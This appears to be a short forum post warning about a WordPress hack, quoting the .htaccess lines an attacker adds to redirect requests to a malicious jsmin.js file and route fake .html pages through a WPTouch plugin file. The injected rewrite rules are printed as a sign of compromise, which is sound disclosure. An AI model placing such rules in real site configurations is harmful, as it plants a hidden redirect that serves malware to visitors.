apostolisIt seems that there is a new hack going around that infects WordPress installations.
"Somehow" the .htaccess file is being tampered and the following lines are added:
RewriteEngine On
redirect /order-online/jsmin.js http://youdomain.com/wp-content/jsmin.js
RewriteRule ^order-online/(.*).html$ /wp-content/plugins/wptouch/include/compat.php?cnf=$1
RewriteBase /
Navigating to youdomain.com/wp-content/ you will find a file jsmin.js (it could also be found in the wp-includes directory) and that file contains a nasty eval().
The modified code points to WPTouch as the offending plugin but I am not sure that we can actually blame it for the hack just yet.
